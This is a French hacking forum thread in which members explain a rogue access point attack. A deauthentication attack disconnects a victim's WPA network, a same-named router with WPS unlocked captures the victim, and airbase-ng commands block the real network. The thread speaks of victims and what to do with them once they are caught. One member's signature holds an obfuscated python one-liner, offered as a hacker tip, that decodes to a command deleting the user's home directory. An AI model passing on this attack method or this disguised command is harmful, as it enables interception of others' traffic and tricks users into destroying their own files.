Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 20-02-2014 14:28:57

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Autre manière de faire un rogue AP

Salut !


Je met a votre disposition une petite vidéo avec la méthode que j'utilise pour faire une rogue AP plus discrète qu'en open (enfin a mon gout)

Le principe est simple, un client windows connecté a son wifi (dans la vidéo un point d'accès hostapd)
Un ordinateur linux configurer avec hostapd et dhcp3-server pour permettre au client windows de se connecter

Et enfin un autre ordinateur toujours sous linux cool permettant de simuler une attaque externe contre le réseau et son client windows, cette ordinateur est connecté en filaire a un routeur portant le meme nom que l'autre réseau et équiper du WPS, pendant la deauth le but et de maintenir le WPS activé et pret a recevoir une connexion.(laissez tourner airodump sur une autre fenetre pour observer ce qui s'y passe)


Je trouve cette technique plus discrète car pas de triangle avec "les informations envoyés sur le réseau peuvent etre vue par d'autres utilisateurs" du coup je me suis amusé pas mal de temps avec ça et j'en ai plus d'un big_smile car meme un oeil avisé verra le réseau en wpa et cliquera dessus par curiosité ou pour se connecter et la si le WPS est en route sur l'autre routeur pret a recevoir une connexion c'est que du bénèf wink

Une fois la victime connectée c'est pas les idées qui manquent smile

Dernière modification par koala (20-02-2014 14:32:03)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 20-02-2014 15:26:24

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 245

Re : Autre manière de faire un rogue AP

très intéressant smile

le but et de maintenir le WPS activé et pret a recevoir une connexion

et ça tu le fait comment? avec wpa_cli?

Hors Ligne

#3 20-02-2014 18:16:21

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Autre manière de faire un rogue AP

Du tout, pas besoin de se prendre la tete avec ça (j'ai toujours pas résolu mon problème avec wpa_cli d'ailleurs) j'utilise juste l'option "WPS activé" d'une neufbox dès que je vois sous airodump qu'une station tente de s'y connecté, il y a a peu près 4 minutes ou le WPS de la box se débloque donc la victime a largement le temps de se connecter dessus wink

C'est vraiment a la portée de n'importe quel c** mais faut etre synchro et bien surveiller sa fenetre airodump.

ça doit ressembler a quelque chose comme ça sur d'autre routeur: (pour les novices)

Screen_Shot002.png


Ensuite vous faites valider et c'est bon big_smile avec SFR vous avez tout compris tongue

Dernière modification par koala (20-02-2014 18:43:24)

Hors Ligne

#4 20-02-2014 20:27:27

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 245

Re : Autre manière de faire un rogue AP

ok, tu le fais avec le firmware d'origine... donc il n'y sûrement pas moyen de lancer wpa_cli depuis le routeur
C'est intéressant ce comportement de windows à proposer en premier le WPS pour chaque nouvelle connexion smile

Hors Ligne

#5 20-02-2014 20:40:46

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Autre manière de faire un rogue AP

Faudra que je retente avec mon tp-link sous ddwrt mais ça n'a jamais marché hmm

Pour windows ça dépend des versions en faite.

Dernière modification par koala (20-02-2014 20:41:41)

Hors Ligne

#6 20-03-2014 18:23:15

InconnuX
Membre
Inscription : 17-03-2014
Messages : 21

Re : Autre manière de faire un rogue AP

Présenté comme ça, c'est vrai que c'est intéressant, bravo wink
Il y a t'il un moyen de reproduire ton exemple avec une Alfa ?

Hors Ligne

#7 20-03-2014 19:34:53

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Autre manière de faire un rogue AP

Je ne saisis pas, en plus d'imiter un réseau proposes le WPS et accepte tous les pins ?
Est-il concevable de faire un rogue AP minimal qui récupère juste les pins qu'on lui envoie ?
(J'en doute, mais je n'ai pas le temps de creuser la spec)


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#8 20-03-2014 19:39:23

Anthonyy59
Membre V.I.P.
Inscription : 03-09-2012
Messages : 277

Re : Autre manière de faire un rogue AP

Super vidéo ! C'est vrai que voir son AP en open ça peut trahir !:)
Par contre je ne savais pas qu'on pouvait créer un rogue AP avec une clé WPA !

Sinon pour voir si le WPS s'active, qu'est-ce qui change sur la fenêtre d'airodump entre un réseau dont le WPS est bloqué et un où le WPS est ouvert?

Hors Ligne

#9 24-03-2014 20:08:16

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Autre manière de faire un rogue AP

Bonsoir wink

InconnuX a écrit :

Il y a t'il un moyen de reproduire ton exemple avec une Alfa ?

Oui il y aurait moyen avec hostapd, j'ai chercher un patch car meme en modifiant le hostapd.conf et en activant le WPS cela ne suffit pas.J'ai trouvé cependant des sujets intéressant qui traite de ça:

WPS daemon for hostapd
Fix hostapd PBC with windows 7 supplicant

J'ai testé le deamon mais j'ai des erreur lors de la compile, par manque de temps j'ai mis en pause mes recherches.

spawn a écrit :

Je ne saisis pas, en plus d'imiter un réseau proposes le WPS et accepte tous les pins ?
Est-il concevable de faire un rogue AP minimal qui récupère juste les pins qu'on lui envoie ?

Je doute que ce soit possible aussi... mais pourquoi pas tenter.Le but pour l'instant et de maintenir déverrouiller le WPS sur le fake AP de sorte a recevoir n'importe quel connexion.

InconnuX a parfaitement compris le concept de ce que j'ai pu voir sur l'autre sujet concernant les rogue AP et le WPS smile


Anthonyy59 a écrit :

Sinon pour voir si le WPS s'active, qu'est-ce qui change sur la fenêtre d'airodump entre un réseau dont le WPS est bloqué et un où le WPS est ouvert?

Attention a la confusion, quand tu deauth le réseau cible et que celui-ci est complètement down, tu t'aperçois au bout d'un certain temps, que la station qui était connecté dessus passe en "NOT ASSOCIATED" et qu'il n'y a plus aucun data circulant sur le dit réseau, de la tu t'arranges pour déverrouiller ton WPS et si le gars derrière son pc regarde dans ses réseaux sans fil et qu'il voit le meme réseau avec le meme cryptage (WPA) il y a une chance sur 2 pour qu'il clique dessus par impatience ou juste car il pense avoir été déconnecter et si le WPS est activer sur le Fake AP c'est sur ton réseau qu'il viendra smile


Je tiens a préciser que pour planter un réseau mdk3 n'est pas la seul solution... il y a des options très sympa dans airbase qui perturbe sacrément les ondes aux alentours, voir l'option -X ou encore -0

airbase-ng -c canal -e essid -I 600 -0 mon0 
ou encore
airbase-ng -c canal -e essid -a bssid mon0

L'avantage de ces commande c'est que le réseau de la victime s'affiche avec une croix rouge dans son réseau sans fil, ou alors en grisé sans possibilité de connexion avec un message du type "les paramètres du réseau ne correspondent pas a ceux enregistrer sur cette ordinateur"... seul votre fake est dans les réseaux a ce moment la tongue


Cherchez un peu sur le forum aussi j'en ai déja assez dit pour aujourd'hui big_smile

Hors Ligne

#10 24-03-2014 22:04:21

FFOO31
Membre d'Or
Inscription : 27-03-2013
Messages : 371

Re : Autre manière de faire un rogue AP

pour pouvoir afficher la croix à la place du réseau de la victime, est ce qu'on doit changer notre MAC qui doit =MAC victime?
et si on lance 2 airbase,
la premiere créé la croix et la 2eme crée rogueAP ? ou l'inverse?

Hors Ligne

#11 24-03-2014 22:17:08

InconnuX
Membre
Inscription : 17-03-2014
Messages : 21

Re : Autre manière de faire un rogue AP

Merci koala pour tes explications.
Je testerai du coté de hostapd quand j'aurais plus de matos wink

Hors Ligne

#12 25-03-2014 09:46:30

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Autre manière de faire un rogue AP

FFOO31 a écrit :

pour pouvoir afficher la croix à la place du réseau de la victime, est ce qu'on doit changer notre MAC qui doit =MAC victime?
et si on lance 2 airbase,
la premiere créé la croix et la 2eme crée rogueAP ? ou l'inverse?

Pour la première réponse non c'est pas utile, quand a la seconde tu ne peux pas lancer 2 airbase sur la meme carte wfi, donc soit tu te procure un routeur équiper du WPS pour le fake AP et tu lances un airbase sur ton pc, soit tu prends une autre carte wifi et a ce moment la tu peux lancer tes 2 airbase sachant que le second n'a pas besoin de la configuration du premier, pas de dhcp3 etc... il est juste la pour feir c**** les ondes du réseau cible.

Quoi qu'il en soit et je vais le dire qu'une fois le reste est sur le forum parmi d'autres sujets, le airbase servant a rendre indisponible le réseau de la victime doit prendre en compte tout les paramètres de ce dernier., exemple:

Livebox-1234 sur le canal 6 avec le bssid chiffre-bidon donnera en commande final

airbase-ng -c 6 -e Livebox1234 -a  chiffre-bidon mon0

Ce n'est pas la seul commande airbase disponible pour faire planter un réseau, donc cherches sur le forum wink

NOTE: ce qui est exellent la dedans c'est que ça ne va affecter que le client du réseau ciblé son windows a gardé en mémoire le réseau original donc un airbase qui arrive a l'improviste se fera automatiquement grillé et windows par sécurité empeche la connexion par une croix rouge ou un message grisé sous le réseau comme mentionné plus haut.De votre coté vous apercevrez le réseau normalement si celui-ci n'est pas enregistré dans votre gestionnaire sans fil.

Dernière modification par koala (25-03-2014 09:48:27)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.029 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]